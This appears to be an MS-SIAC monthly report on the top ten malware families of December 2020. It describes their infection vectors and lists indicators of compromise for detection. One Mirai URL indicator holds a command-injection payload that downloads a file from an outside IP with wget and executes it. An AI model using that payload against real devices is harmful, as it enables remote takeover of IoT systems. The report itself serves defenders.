Top 10 Malware December 2020

In December 2020, the MS-SIAC observed 4 malware (CryptoWall, NanoCore, Ursnif, and ZeuS) return to the Top 10. The Top 10 Malware variants composed 72% of total malware activity in December 2020, decreasing 6% from November 2020. Despite the decrease in Shlayer activity, it will highly likely continue its prevalence in the Top 10 Malware due to some schools and universities going back to in person teaching or into a hybrid model after the holidays.

In December 2020, malvertisement accounted for the greatest number of alerts. Malvertisement continues to be the top initial infection vector is due to Shlayer. Shlayer returned to the Top 10 Malware after new evidence resulted in it being reclassified as a trojan downloader compared to an adware dropper. Activity levels for malspam and multiple increased, while activity for dropped decreased. Although Shlayer activity continues to decrease, it highly likely that malvertisement will remain the primary infection vector as the Shlayer campaign pans out.

Dropped – Malware delivered by other malware already on the system, an exploit kit, infected third-party software, or manually by a cyber threat actor. Gh0st and Mirai are the only malware being dropped.

Multiple – Malware that currently favors at least two vectors. Currently, CryptoWall and ZeuS are the only malware utilizing multiple vectors. ZeuS is dropped by other malware, but it is also delivered via malvertisement.

Malspam – Unsolicited emails, which either direct users to malicious web sites or trick users into downloading or opening malware. Top 10 Malware using this technique Agent Tesla, Dridex, NanoCore, Snugy, and Ursnif.

Malvertisement – Malware introduced through malicious advertisements. Currently, Shlayer is the only Top 10 Malware using this technique.

Top 10 Malware and IOCs

Below are the Top 10 Malware ranked in order of prevalence. The respective indicators of compromise (IOCs) are provided to aid in detecting and preventing infections from these Top 10 Malware variants.

1. Shlayer

Shlayer is a downloader and dropper for MacOS malware. It is primarily distributed through malicious websites, hijacked domains, and malvertizing posing as a fake Adobe Flash updater.
All Shlayer domains follow the same pattern <api.random_name.com>. Below area several examples of domains Shlayer uses.

Domains

  • api.interfacecache[.]com
  • api.scalableunit[.]com
  • api.typicalconfig[.]com
  • api.standartanalog[.]com
  • api.fieldenumerator[.]com
  • api.practicalsprint[.]com
  • api.searchwebsvc[.]com
  • api.connectedtask[.]com
  • api.navigationbuffer[.]com
  • api.windowtask[.]com

2. CryptoWall

CryptoWall is a ransomware commonly distributed through malspam with malicious ZIP attachments, Java Vulnerabilities, and malicious advertisements. Upon successful infection, CryptoWall will scan the system for drive letters, network shares, and removable drives. CryptoWall runs on both 32-bit and 64-bit systems.

3. Agent Tesla

Agent Tesla is a RAT that exfiltrates credentials, log keystrokes, and capture screenshots from an infected computer.

4. Gh0st

Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device.

5. Snugy

Snugy is a PowerShell based backdoor that allows an attacker to obtain the system's hostname and to run commands. This backdoor communicates through a DNS tunneling channel on the compromised server.

6. ZeuS

ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants have adopted parts of it’s codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.

Domains

  • Opaopa[.]info
  • Edmontonjournal[.]com

IPs

  • 8.208.90[.]18
  • 163.172.61{.}158
  • 185.244.217[.]126

URL

  • /gate.php
  • /index.php?image=pic1.png&mmcpw=C_Uahb8x81_oKUqzoMR5xjzrBD1wITOlGt4e
  • /index.php?image=pic1.png&punqqq=1w4vrLh7NI_hnnm5fIDzb0SgZQ3hpk9ZgtdIIdrf*0nm7mGXfRQiOJqp
  • /news/8101128.bin
  • /news/8101316.bin
  • /news/8101335.bin
  • /news/8101336.bin
  • /news/8101339.bin
  • /news/8101340.bin
  • /news/8101344.bin
  • /news/8107012.bin
  • /news/8107013.bin
  • /news/8107014.bin
  • /news/8107015.bin

7. Nanocor

Nanocore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.

8. Dridex

Dridex is a banking trojan that uses malicious macros in Microsoft Office with either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns.

Domains

  • Oneyearnovel[.]com

9. Ursnif, and its variant Dreambot

Ursnif, and its variant Dreambot, are banking trojans known for weaponizing documents. Ursnif recently upgraded its web injection attacks to include TLS callbacks in order to obfuscate against anti-malware software. Ursnif collects victim information from login pages and web forms.

10. Mirai

Mirai is a malware botnet known to compromise internet of things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.

Domains

  • cdn[.]liftoff[.]io

URL

  • /customers/4658fb8d67/images/v1/78cf84fdb7cfabbd8200.jpg
  • /customers/5a8e32ecee/images/v1/ecf1e61048.jpg
  • /customers/c4f77ab60c/images/v1/aa75cd2f99441664141a.jpg
  • /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
  • /lookup?bundleId=com.easybrain.puzzles